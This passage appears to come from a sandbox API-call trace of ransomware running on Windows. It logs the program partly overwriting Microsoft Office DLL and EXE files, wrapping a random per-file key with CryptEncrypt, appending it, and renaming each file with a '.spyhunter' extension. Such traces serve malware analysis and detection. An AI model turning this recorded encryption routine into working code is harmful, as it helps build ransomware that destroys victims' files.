(lpString="\\\\?\\C:\\Program Files (x86)\\Microsoft Office\\Office14\\MSOHTMED.EXE") returned 65 [0166.314] StrStrW (lpFirst="MSOHTMED.EXE", lpSrch=".txt") returned 0x0 [0166.314] GetProcessHeap () returned 0x2c0000 [0166.314] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0166.314] ReadFile (in: hFile=0xa0, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57e71c, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x57e71c*=0x2800, lpOverlapped=0x0) returned 1 [0166.328] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0166.329] WriteFile (in: hFile=0xa0, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x57e71c, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x57e71c*=0x2800, lpOverlapped=0x0) returned 1 [0166.329] GetProcessHeap () returned 0x2c0000 [0166.329] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0166.329] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0166.329] WriteFile (in: hFile=0xa0, lpBuffer=0x57e75c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57e71c, lpOverlapped=0x0 | out: lpBuffer=0x57e75c*, lpNumberOfBytesWritten=0x57e71c*=0x4, lpOverlapped=0x0) returned 1 [0166.411] WriteFile (in: hFile=0xa0, lpBuffer=0x31f098*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57e71c, lpOverlapped=0x0 | out: lpBuffer=0x31f098*, lpNumberOfBytesWritten=0x57e71c*=0x30, lpOverlapped=0x0) returned 1 [0166.411] CloseHandle (hObject=0xa0) returned 1 [0166.411] GetProcessHeap () returned 0x2c0000 [0166.411] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fb1c8 [0166.411] wnsprintfW (in: pszDest=0x2fb1c8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Microsoft Office\\Office14\\MSOHTMED.EXE.spyhunter") returned 75 [0166.411] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Microsoft Office\\Office14\\MSOHTMED.EXE" (normalized: "c:\\program files (x86)\\microsoft office\\office14\\msohtmed.exe"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Microsoft Office\\Office14\\MSOHTMED.EXE.spyhunter" (normalized: "c:\\program files (x86)\\microsoft office\\office14\\msohtmed.exe.spyhunter")) returned 1 [0166.412] GetProcessHeap () returned 0x2c0000 [0166.413] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fb1c8 | out: hHeap=0x2c0000) returned 1 [0166.413] GetProcessHeap () returned 0x2c0000 [0166.413] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0166.413] GetProcessHeap () returned 0x2c0000 [0166.413] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e05898 | out: hHeap=0x2c0000) returned 1 [0166.413] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57e760 | out: pbBuffer=0x57e760) returned 1 [0166.413] GetProcessHeap () returned 0x2c0000 [0166.413] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0166.413] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x57e758*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x57e758*=0x30) returned 1 [0166.413] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Microsoft Office\\Office14\\DGRMLNCH.DLL" (normalized: "c:\\program files (x86)\\microsoft office\\office14\\dgrmlnch.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa0 [0166.415] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Microsoft Office\\Office14\\DGRMLNCH.DLL") returned 65 [0166.415] StrStrW (lpFirst="DGRMLNCH.DLL", lpSrch=".txt") returned 0x0 [0166.415] GetProcessHeap () returned 0x2c0000 [0166.415] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0166.415] ReadFile (in: hFile=0xa0, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57e71c, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x57e71c*=0x2800, lpOverlapped=0x0) returned 1 [0166.416] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0166.417] WriteFile (in: hFile=0xa0, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x57e71c, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x57e71c*=0x2800, lpOverlapped=0x0) returned 1 [0166.417] GetProcessHeap () returned 0x2c0000 [0166.417] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0166.417] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0166.417] WriteFile (in: hFile=0xa0, lpBuffer=0x57e75c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57e71c, lpOverlapped=0x0 | out: lpBuffer=0x57e75c*, lpNumberOfBytesWritten=0x57e71c*=0x4, lpOverlapped=0x0) returned 1 [0166.426] WriteFile (in: hFile=0xa0, lpBuffer=0x31f098*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57e71c, lpOverlapped=0x0 | out: lpBuffer=0x31f098*, lpNumberOfBytesWritten=0x57e71c*=0x30, lpOverlapped=0x0) returned 1 [0166.427] CloseHandle (hObject=0xa0) returned 1 [0166.427] GetProcessHeap () returned 0x2c0000 [0166.427] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fb1c8 [0166.427] wnsprintfW (in: pszDest=0x2fb1c8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Microsoft Office\\Office14\\DGRMLNCH.DLL.spyhunter") returned 75 [0166.427] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Microsoft Office\\Office14\\DGRMLNCH.DLL" (normalized: "c:\\program files (x86)\\microsoft office\\office14\\dgrmlnch.dll"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Microsoft Office\\Office14\\DGRMLNCH.DLL.spyhunter" (normalized: "c:\\program files (x86)\\microsoft office\\office14\\dgrmlnch.dll.spyhunter")) returned 1 [0166.428] GetProcessHeap () returned 0x2c0000 [0166.428] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fb1c8 | out: hHeap=0x2c0000) returned 1 [0166.428] GetProcessHeap () returned 0x2c0000 [0166.428] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0166.428] GetProcessHeap () returned 0x2c0000 [0166.428] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e05558 | out: hHeap=0x2c0000) returned 1 [0166.428] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57e758 | out: pbBuffer=0x57e758) returned 1 [0166.428] GetProcessHeap () returned 0x2c0000 [0166.428] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0166.429] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x57e750*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x57e750*=0x30) returned 1 [0166.429] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Microsoft Office\\Office14\\BCSLaunch.dll" (normalized: "c:\\program files (x86)\\microsoft office\\office14\\bcslaunch.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa0 [0166.430] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Microsoft Office\\Office14\\BCSLaunch.dll") returned 66 [0166.430] StrStrW (lpFirst="BCSLaunch.dll", lpSrch=".txt") returned 0x0 [0166.430] GetProcessHeap () returned 0x2c0000 [0166.430] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0166.430] ReadFile (in: hFile=0xa0, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57e714, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x57e714*=0x2800, lpOverlapped=0x0) returned 1 [0166.648] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0166.649] WriteFile (in: hFile=0xa0, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x57e714, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x57e714*=0x2800, lpOverlapped=0x0) returned 1 [0166.649] GetProcessHeap () returned 0x2c0000 [0166.649] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0166.649] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0166.649] WriteFile (in: hFile=0xa0, lpBuffer=0x57e754*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57e714, lpOverlapped=0x0 | out: lpBuffer=0x57e754*, lpNumberOfBytesWritten=0x57e714*=0x4, lpOverlapped=0x0) returned 1 [0166.691] WriteFile (in: hFile=0xa0, lpBuffer=0x31f098*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57e714, lpOverlapped=0x0 | out: lpBuffer=0x31f098*, lpNumberOfBytesWritten=0x57e714*=0x30, lpOverlapped=0x0) returned 1 [0166.691] CloseHandle (hObject=0xa0) returned 1 [0166.691] GetProcessHeap () returned 0x2c0000 [0166.692] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fb1c8 [0166.692] wnsprintfW (in: pszDest=0x2fb1c8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Microsoft Office\\Office14\\BCSLaunch.dll.spyhunter") returned 76 [0166.692] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Microsoft Office\\Office14\\BCSLaunch.dll" (normalized: "c:\\program files (x86)\\microsoft office\\office14\\bcslaunch.dll"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Microsoft Office\\Office14\\BCSLaunch.dll.spyhunter" (normalized: "c:\\program files (x86)\\microsoft office\\office14\\bcslaunch.dll.spyhunter")) returned 1 [0166.693] GetProcessHeap () returned 0x2c0000 [0166.693] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fb1c8 | out: hHeap=0x2c0000) returned 1 [0166.693] GetProcessHeap () returned 0x2c0000 [0166.693] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0166.693] GetProcessHeap () returned 0x2c0000 [0166.693] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e05488 | out: hHeap=0x2c0000) returned 1 [0166.693] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57e758 | out: pbBuffer=0x57e758) returned 1 [0166.694] GetProcessHeap () returned 0x2c0000 [0166.694] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0166.694] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x57e750*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x57e750*=0x30) returned 1 [0166.694] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Microsoft Office\\Office14\\1033\\UMLVSUI.DLL" (normalized: "c:\\program files (x86)\\microsoft office\\office14\\1033\\umlvsui.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa0 [0166.697] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Microsoft Office\\Office14\\1033\\UMLVSUI.DLL") returned 69 [0166.697] StrStrW (lpFirst="UMLVSUI.DLL", lpSrch=".txt") returned 0x0 [0166.697] GetProcessHeap () returned 0x2c0000 [0166.697] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c34bd0 [0166.697] ReadFile (in: hFile=0xa0, lpBuffer=0x2c34bd0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57e714, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesRead=0x57e714*=0x2800, lpOverlapped=0x0) returned 1 [0166.704] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0166.704] WriteFile (in: hFile=0xa0, lpBuffer=0x2c34bd0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x57e714, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesWritten=0x57e714*=0x2800, lpOverlapped=0x0) returned 1 [0166.704] GetProcessHeap () returned 0x2c0000 [0166.704] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c34bd0 | out: hHeap=0x2c0000) returned 1 [0166.704] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0166.704] WriteFile (in: hFile=0xa0, lpBuffer=0x57e754*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57e714, lpOverlapped=0x0 | out: lpBuffer=0x57e754*, lpNumberOfBytesWritten=0x57e714*=0x4, lpOverlapped=0x0) returned 1 [0166.705] WriteFile (in: hFile=0xa0, lpBuffer=0x31f098*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57e714, lpOverlapped=0x0 | out: lpBuffer=0x31f098*, lpNumberOfBytesWritten=0x57e714*=0x30, lpOverlapped=0x0) returned 1 [0166.705] CloseHandle (hObject=0xa0) returned 1 [0166.705] GetProcessHeap () returned 0x2c0000 [0166.705] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fb1c8 [0166.705] wnsprintfW (in: pszDest=0x2fb1c8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Microsoft Office\\Office14\\1033\\UMLVSUI.DLL.spyhunter") returned 79 [0166.705] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Microsoft Office\\Office14\\1033\\UMLVSUI.DLL" (normalized: "c:\\program files (x86)\\microsoft office\\office14\\1033\\umlvsui.dll"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Microsoft Office\\Office14\\1033\\UMLVSUI.DLL.spyhunter" (normalized: "c:\\program files (x86)\\microsoft office\\office14\\1033\\umlvsui.dll.spyhunter")) returned 1 [0166.706] GetProcessHeap () returned 0x2c0000 [0166.706] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fb1c8 | out: hHeap=0x2c0000) returned 1 [0166.706] GetProcessHeap () returned 0x2c0000 [0166.706] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0166.706] GetProcessHeap () returned 0x2c0000 [0166.706] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e7e550 | out: hHeap=0x2c0000) returned 1 [0166.706] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57e750 | out: pbBuffer=0x57e750) returned 1 [0166.706] GetProcessHeap () returned 0x2c0000 [0166.706] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0166.706] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x57e748*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x57e748*=0x30) returned 1 [0166.706] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Microsoft Office\\Office14\\1033\\UMLVBRES.DLL" (normalized: "c:\\program files (x86)\\microsoft office\\office14\\1033\\umlvbres.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa0 [0166.707] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Microsoft Office\\Office14\\1033\\UMLVBRES.DLL") returned 70 [0166.707] StrStrW (lpFirst="UMLVBRES.DLL", lpSrch=".txt") returned 0x0 [0166.707] GetProcessHeap () returned 0x2c0000 [0166.707] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c34bd0 [0166.707] ReadFile (in: hFile=0xa0, lpBuffer=0x2c34bd0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57e70c, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesRead=0x57e70c*=0x2800, lpOverlapped=0x0) returned 1 [0166.714] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0166.714] WriteFile (in: hFile=0xa0, lpBuffer=0x2c34bd0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x57e70c, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesWritten=0x57e70c*=0x2800, lpOverlapped=0x0) returned 1 [0166.714] GetProcessHeap () returned 0x2c0000 [0166.714] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c34bd0 | out: hHeap=0x2c0000) returned 1 [0166.714] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0166.715] WriteFile (in: hFile=0xa0, lpBuffer=0x57e74c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57e70c, lpOverlapped=0x0 | out: lpBuffer=0x57e74c*, lpNumberOfBytesWritten=0x57e70c*=0x4, lpOverlapped=0x0) returned 1 [0166.723] WriteFile (in: hFile=0xa0, lpBuffer=0x31f098*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57e70c, lpOverlapped=0x0 | out: lpBuffer=0x31f098*, lpNumberOfBytesWritten=0x57e70c*=0x30, lpOverlapped=0x0) returned 1 [0166.723] CloseHandle (hObject=0xa0) returned 1 [0166.723] GetProcessHeap () returned 0x2c0000 [0166.723] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fb1c8 [0166.723] wnsprintfW (in: pszDest=0x2fb1c8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Microsoft Office\\Office14\\1033\\UMLVBRES.DLL.spyhunter") returned 80 [0166.723] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Microsoft Office\\Office14\\1033\\UMLVBRES.DLL" (normalized: "c:\\program files (x86)\\microsoft office\\office14\\1033\\umlvbres.dll"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Microsoft Office\\Office14\\1033\\UMLVBRES.DLL.spyhunter" (normalized: "c:\\program files (x86)\\microsoft office\\office14\\1033\\umlvbres.dll.spyhunter")) returned 1 [0166.724] GetProcessHeap () returned 0x2c0000 [0166.724] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fb1c8 | out: hHeap=0x2c0000) returned 1 [0166.724] GetProcessHeap () returned 0x2c0000 [0166.724] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0166.724] GetProcessHeap () returned 0x2c0000 [0166.725] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e7e3a0 | out: hHeap=0x2c0000) returned 1 [0166.725] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57e750 | out: pbBuffer=0x57e750) returned 1 [0166.725] GetProcessHeap () returned 0x2c0000 [0166.725] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0166.725] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x57e748*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x57e748*=0x30) returned 1 [0166.725] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Microsoft Office\\Office14\\1033\\STSUPLD.INTL.DLL" (normalized: "c:\\program files (x86)\\microsoft office\\office14\\1033\\stsupld.intl.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa0 [0166.726] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Microsoft Office\\Office14\\1033\\STSUPLD.INTL.DLL") returned 74 [0166.727] StrStrW (lpFirst="STSUPLD.INTL.DLL", lpSrch=".txt") returned 0x0 [0166.727] GetProcessHeap () returned 0x2c0000 [0166.727] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c34bd0 [0166.727] ReadFile (in: hFile=0xa0, lpBuffer=0x2c34bd0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57e70c, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesRead=0x57e70c*=0x2800, lpOverlapped=0x0) returned 1 [0166.731] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0166.731] WriteFile (in: hFile=0xa0, lpBuffer=0x2c34bd0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x57e70c, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesWritten=0x57e70c*=0x2800, lpOverlapped=0x0) returned 1 [0166.731] GetProcessHeap () returned 0x2c0000 [0166.731] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c34bd0 | out: hHeap=0x2c0000) returned 1 [0166.731] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0166.732] WriteFile (in: hFile=0xa0, lpBuffer=0x57e74c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57e70c, lpOverlapped=0x0 | out: lpBuffer=0x57e74c*, lpNumberOfBytesWritten=0x57e70c*=0x4, lpOverlapped=0x0) returned 1 [0166.755] WriteFile (in: hFile=0xa0, lpBuffer=0x31f098*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57e70c, lpOverlapped=0x0 | out: lpBuffer=0x31f098*, lpNumberOfBytesWritten=0x57e70c*=0x30, lpOverlapped=0x0) returned 1 [0166.755] CloseHandle (hObject=0xa0) returned 1 [0166.755] GetProcessHeap () returned 0x2c0000 [0166.755] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fb1c8 [0166.755] wnsprintfW (in: pszDest=0x2fb1c8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Microsoft Office\\Office14\\1033\\STSUPLD.INTL.DLL.spyhunter") returned 84 [0166.755] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Microsoft Office\\Office14\\1033\\STSUPLD.INTL.DLL" (normalized: "c:\\program files (x86)\\microsoft office\\office14\\1033\\stsupld.intl.dll"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Microsoft Office\\Office14\\1033\\STSUPLD.INTL.DLL.spyhunter" (normalized: "c:\\program files (x86)\\microsoft office\\office14\\1033\\stsupld.intl.dll.spyhunter")) returned 1 [0166.756] GetProcessHeap () returned 0x2c0000 [0166.756] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fb1c8 | out: hHeap=0x2c0000) returned 1 [0166.756] GetProcessHeap () returned 0x2c0000 [0166.756] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0166.756] GetProcessHeap () returned 0x2c0000 [0166.756] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ee50b0 | out: hHeap=0x2c0000) returned 1 [0166.757] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57e748 | out: pbBuffer=0x57e748) returned 1 [0166.757] GetProcessHeap () returned 0x2c0000 [0166.757] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0166.757] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x57e740*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x57e740*=0x30) returned 1 [0166.757] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Microsoft Office\\Office14\\1033\\MAPISHELLR.DLL" (normalized: "c:\\program files (x86)\\microsoft office\\office14\\1033\\mapishellr.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa0 [0166.758] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Microsoft Office\\Office14\\1033\\MAPISHELLR.DLL") returned 72 [0166.758] StrStrW (lpFirst="MAPISHELLR.DLL", lpSrch=".txt") returned 0x0 [0166.758] GetProcessHeap () returned 0x2c0000 [0166.758] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c39fe0 [0166.758] ReadFile (in: hFile=0xa0, lpBuffer=0x2c39fe0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57e704, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesRead=0x57e704*=0x2800, lpOverlapped=0x0) returned 1 [0166.770] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0166.770] WriteFile (in: hFile=0xa0, lpBuffer=0x2c39fe0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x57e704, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesWritten=0x57e704*=0x2800, lpOverlapped=0x0) returned 1 [0166.770] GetProcessHeap () returned 0x2c0000 [0166.770] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c39fe0 | out: hHeap=0x2c0000) returned 1 [0166.770] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0166.770] WriteFile (in: hFile=0xa0, lpBuffer=0x57e744*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57e704, lpOverlapped=0x0 | out: lpBuffer=0x57e744*, lpNumberOfBytesWritten=0x57e704*=0x4, lpOverlapped=0x0) returned 1 [0166.783] WriteFile (in: hFile=0xa0, lpBuffer=0x31f098*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57e704, lpOverlapped=0x0 | out: lpBuffer=0x31f098*, lpNumberOfBytesWritten=0x57e704*=0x30, lpOverlapped=0x0) returned 1 [0166.784] CloseHandle (hObject=0xa0) returned 1 [0166.787] GetProcessHeap () returned 